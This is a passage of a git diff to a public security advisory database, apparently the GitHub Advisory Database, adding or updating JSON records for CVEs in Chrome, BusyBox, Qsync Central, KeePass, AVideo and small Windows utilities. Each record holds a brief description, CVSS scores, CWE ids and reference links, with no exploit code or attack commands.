"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37203" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47867" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/office-product-key-finder-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pp78-hqqc-jrrq/GHSA-pp78-hqqc-jrrq.json b/advisories/unreviewed/2026/02/GHSA-pp78-hqqc-jrrq/GHSA-pp78-hqqc-jrrq.json new file mode 100644 index 0000000000000..87ed47e341650 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pp78-hqqc-jrrq/GHSA-pp78-hqqc-jrrq.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pp78-hqqc-jrrq", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2026-2319" + ], + "details": "Race in DevTools in Google Chrome prior to 145.0.7632.45 allowed a remote attacker who convinced a user to engage in specific UI gestures and install a malicious extension to potentially exploit object corruption via a malicious file. (Chromium security severity: Medium)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2319" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_10.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/40071155" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pqwv-wwjj-f9gv/GHSA-pqwv-wwjj-f9gv.json b/advisories/unreviewed/2026/02/GHSA-pqwv-wwjj-f9gv/GHSA-pqwv-wwjj-f9gv.json new file mode 100644 index 0000000000000..55edd88816445 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pqwv-wwjj-f9gv/GHSA-pqwv-wwjj-f9gv.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqwv-wwjj-f9gv", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37207" + ], + "details": "SpotDialup 1.6.7 contains a denial of service vulnerability in the registration key input field that allows attackers to crash the application. Attackers can generate a 1000-character buffer payload and paste it into the 'Key' field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37207" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47872" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spotdialup-key-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pw6x-8hxj-hv8c/GHSA-pw6x-8hxj-hv8c.json b/advisories/unreviewed/2026/02/GHSA-pw6x-8hxj-hv8c/GHSA-pw6x-8hxj-hv8c.json index 23046f808370d..a759b042aefda 100644 --- a/advisories/unreviewed/2026/02/GHSA-pw6x-8hxj-hv8c/GHSA-pw6x-8hxj-hv8c.json +++ b/advisories/unreviewed/2026/02/GHSA-pw6x-8hxj-hv8c/GHSA-pw6x-8hxj-hv8c.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-q3c5-6hmj-6999/GHSA-q3c5-6hmj-6999.json b/advisories/unreviewed/2026/02/GHSA-q3c5-6hmj-6999/GHSA-q3c5-6hmj-6999.json new file mode 100644 index 0000000000000..f1ac9b74d5223 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q3c5-6hmj-6999/GHSA-q3c5-6hmj-6999.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q3c5-6hmj-6999", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37206" + ], + "details": "ShareAlarmPro contains a denial of service vulnerability that allows attackers to crash the application by supplying an oversized registration key. Attackers can generate a 1000-character buffer payload to trigger an application crash when pasted into the registration key field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37206" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47859" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/sharealarmpro-advanced-network-access-control-key-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q5vh-ff4q-5j62/GHSA-q5vh-ff4q-5j62.json b/advisories/unreviewed/2026/02/GHSA-q5vh-ff4q-5j62/GHSA-q5vh-ff4q-5j62.json index 56f1705977b19..e45f9a5f710f4 100644 --- a/advisories/unreviewed/2026/02/GHSA-q5vh-ff4q-5j62/GHSA-q5vh-ff4q-5j62.json +++ b/advisories/unreviewed/2026/02/GHSA-q5vh-ff4q-5j62/GHSA-q5vh-ff4q-5j62.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q5vh-ff4q-5j62", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-11T21:30:39Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-48723" ], "details": "A buffer overflow vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-q8w6-j65f-cxr6/GHSA-q8w6-j65f-cxr6.json b/advisories/unreviewed/2026/02/GHSA-q8w6-j65f-cxr6/GHSA-q8w6-j65f-cxr6.json index df4a295ca3fcb..f1a8f70bcdaf2 100644 --- a/advisories/unreviewed/2026/02/GHSA-q8w6-j65f-cxr6/GHSA-q8w6-j65f-cxr6.json +++ b/advisories/unreviewed/2026/02/GHSA-q8w6-j65f-cxr6/GHSA-q8w6-j65f-cxr6.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-q922-v4r9-2x72/GHSA-q922-v4r9-2x72.json b/advisories/unreviewed/2026/02/GHSA-q922-v4r9-2x72/GHSA-q922-v4r9-2x72.json index 83dff9b960a77..986eac1cf787b 100644 --- a/advisories/unreviewed/2026/02/GHSA-q922-v4r9-2x72/GHSA-q922-v4r9-2x72.json +++ b/advisories/unreviewed/2026/02/GHSA-q922-v4r9-2x72/GHSA-q922-v4r9-2x72.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-qhpc-j29f-q7jq/GHSA-qhpc-j29f-q7jq.json b/advisories/unreviewed/2026/02/GHSA-qhpc-j29f-q7jq/GHSA-qhpc-j29f-q7jq.json index fcaee24242eaf..5953f2030acf0 100644 --- a/advisories/unreviewed/2026/02/GHSA-qhpc-j29f-q7jq/GHSA-qhpc-j29f-q7jq.json +++ b/advisories/unreviewed/2026/02/GHSA-qhpc-j29f-q7jq/GHSA-qhpc-j29f-q7jq.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qhpc-j29f-q7jq", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-11T21:30:39Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-48724" ], "details": "A buffer overflow vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-qpgr-f49w-gfpx/GHSA-qpgr-f49w-gfpx.json b/advisories/unreviewed/2026/02/GHSA-qpgr-f49w-gfpx/GHSA-qpgr-f49w-gfpx.json new file mode 100644 index 0000000000000..ac84d92791603 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qpgr-f49w-gfpx/GHSA-qpgr-f49w-gfpx.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qpgr-f49w-gfpx", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37189" + ], + "details": "TaskCanvas 1.4.0 contains a denial of service vulnerability in the registration code input field that allows attackers to crash the application. Attackers can generate a 1000-character buffer payload and paste it into the registration field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37189" + }, + { + "type": "WEB", + "url": "https://www.digitalvolcano.co.uk" + }, + { + "type": "WEB", + "url": "https://www.digitalvolcano.co.uk/taskcanvasdownload.html" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47911" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/taskcanvas-registration-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qprx-jf5f-fhhx/GHSA-qprx-jf5f-fhhx.json b/advisories/unreviewed/2026/02/GHSA-qprx-jf5f-fhhx/GHSA-qprx-jf5f-fhhx.json new file mode 100644 index 0000000000000..26ccd508535e2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qprx-jf5f-fhhx/GHSA-qprx-jf5f-fhhx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qprx-jf5f-fhhx", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2026-2322" + ], + "details": "Inappropriate implementation in File input in Google Chrome prior to 145.0.7632.45 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2322" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_10.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/470928605" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-451" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json b/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json new file mode 100644 index 0000000000000..7a095742f0820 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qxf4-rqx4-9mqj", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2020-37158" + ], + "details": "AVideo Platform 8.1 contains a cross-site request forgery vulnerability that allows attackers to reset user passwords by exploiting the password recovery mechanism. Attackers can craft malicious requests to the recoverPass endpoint using the user's recovery token to change account credentials without authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37158" + }, + { + "type": "WEB", + "url": "https://avideo.com" + }, + { + "type": "WEB", + "url": "https://github.com/WWBN/AVideo" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/48003" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/avideo-platform-cross-site-request-forgery-password-reset" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-640" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r2c7-m48p-r86q/GHSA-r2c7-m48p-r86q.json b/advisories/unreviewed/2026/02/GHSA-r2c7-m48p-r86q/GHSA-r2c7-m48p-r86q.json new file mode 100644 index 0000000000000..6a497361d70b1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r2c7-m48p-r86q/GHSA-r2c7-m48p-r86q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r2c7-m48p-r86q", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:42Z", + "aliases": [ + "CVE-2020-37213" + ], + "details": "TextCrawler Pro 3.1.1 contains a denial of service vulnerability that allows attackers to crash the application by sending an oversized buffer in the license key field. Attackers can generate a 6000-byte payload and paste it into the activation field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37213" + }, + { + "type": "WEB", + "url": "https://www.digitalvolcano.co.uk/index.html" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47862" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/textcrawler-pro-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r2ww-vx8x-gqmg/GHSA-r2ww-vx8x-gqmg.json b/advisories/unreviewed/2026/02/GHSA-r2ww-vx8x-gqmg/GHSA-r2ww-vx8x-gqmg.json new file mode 100644 index 0000000000000..6aa7f6d42b856 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r2ww-vx8x-gqmg/GHSA-r2ww-vx8x-gqmg.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r2ww-vx8x-gqmg", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37178" + ], + "details": "KeePass Password Safe versions before 2.44 contain a denial of service vulnerability in the help system's HTML handling. Attackers can trigger the vulnerability by dragging and dropping malicious HTML files into the help area, potentially causing application instability or crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37178" + }, + { + "type": "WEB", + "url": "https://keepass.info" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47952" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/keepass-denial-of-service-poc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r7qg-5929-634m/GHSA-r7qg-5929-634m.json b/advisories/unreviewed/2026/02/GHSA-r7qg-5929-634m/GHSA-r7qg-5929-634m.json new file mode 100644 index 0000000000000..50e3629e982f1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r7qg-5929-634m/GHSA-r7qg-5929-634m.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r7qg-5929-634m", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37185" + ], + "details": "Backup Key Recovery 2.2.5 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the 'Name' input field. Attackers can generate a 1000-character payload and paste it into the registration name field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37185" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47909" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/backup-key-recovery-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8f8-4pgh-4m8v/GHSA-r8f8-4pgh-4m8v.json b/advisories/unreviewed/2026/02/GHSA-r8f8-4pgh-4m8v/GHSA-r8f8-4pgh-4m8v.json new file mode 100644 index 0000000000000..16782ff5d4e65 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r8f8-4pgh-4m8v/GHSA-r8f8-4pgh-4m8v.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8f8-4pgh-4m8v", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:42Z", + "aliases": [ + "CVE-2026-26158" + ], + "details": "A flaw was found in BusyBox. This vulnerability allows an attacker to modify files outside of the intended extraction directory by crafting a malicious tar archive containing unvalidated hardlink or symlink entries. If the tar archive is extracted with elevated privileges, this flaw can lead to privilege escalation, enabling an attacker to gain unauthorized access to critical system files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26158" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-26158" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439040" + }, + { + "type": "WEB", + "url": "https://git.busybox.net/busybox/commit/archival?id=3fb6b31c716669e12f75a2accd31bb7685b1a1cb" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-73" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rccq-h9rv-fmqp/GHSA-rccq-h9rv-fmqp.json b/advisories/unreviewed/2026/02/GHSA-rccq-h9rv-fmqp/GHSA-rccq-h9rv-fmqp.json index 1d501a038720d..efe8d2b697520 100644 --- a/advisories/unreviewed/2026/02/GHSA-rccq-h9rv-fmqp/GHSA-rccq-h9rv-fmqp.json +++ b/advisories/unreviewed/2026/02/GHSA-rccq-h9rv-fmqp/GHSA-rccq-h9rv-fmqp.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rccq-h9rv-fmqp", - "modified": "2026-02-11T15:30:24Z", + "modified": "2026-02-11T21:30:38Z", "published": "2026-02-11T15:30:24Z", "aliases": [ "CVE-2025-30276" ], "details": "An out-of-bounds write vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify or corrupt memory.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-rj79-m8w5-gpw8/GHSA-rj79-m8w5-gpw8.json b/advisories/unreviewed/2026/02/GHSA-rj79-m8w5-gpw8/GHSA-rj79-m8w5-gpw8.json new file mode 100644 index 0000000000000..322ab7c02de2d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rj79-m8w5-gpw8/GHSA-rj79-m8w5-gpw8.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rj79-m8w5-gpw8", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2026-2320" + ], + "details": "Inappropriate implementation in File input in Google Chrome prior to 145.0.7632.45 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2320" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_10.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/435684924" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rjm9-mq62-f4fp/GHSA-rjm9-mq62-f4fp.json b/advisories/unreviewed/2026/02/GHSA-rjm9-mq62-f4fp/GHSA-rjm9-mq62-f4fp.json index b3cdaec486048..2a414e77dabae 100644 --- a/advisories/unreviewed/2026/02/GHSA-rjm9-mq62-f4fp/GHSA-rjm9-mq62-f4fp.json +++ b/advisories/unreviewed/2026/02/GHSA-rjm9-mq62-f4fp/GHSA-rjm9-mq62-f4fp.json @@ -54,7 +54,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-404" + "CWE-404", + "CWE-476" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-rm7q-jj78-qfc9/GHSA-rm7q-jj78-qfc9.json b/advisories/unreviewed/2026/02/GHSA-rm7q-jj78-qfc9/GHSA-rm7q-jj78-qfc9.json index 5518cee284a70..f63e5d8167a4d 100644 --- a/advisories/unreviewed/2026/02/GHSA-rm7q-jj78-qfc9/GHSA-rm7q-jj78-qfc9.json +++ b/advisories/unreviewed/2026/02/GHSA-rm7q-jj78-qfc9/GHSA-rm7q-jj78-qfc9.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-rr27-5cg7-jpp5/GHSA-rr27-5cg7-jpp5.json b/advisories/unreviewed/2026/02/GHSA-rr27-5cg7-jpp5/GHSA-rr27-5cg7-jpp5.json new file mode 100644 index 0000000000000..cdb3c1d3a28f3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rr27-5cg7-jpp5/GHSA-rr27-5cg7-jpp5.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rr27-5cg7-jpp5", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2024-26478" + ], + "details": "An issue in Statping-ng v.0.91.0 allows an attacker to obtain sensitive information via a crafted request to the /api/users endpoint.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": 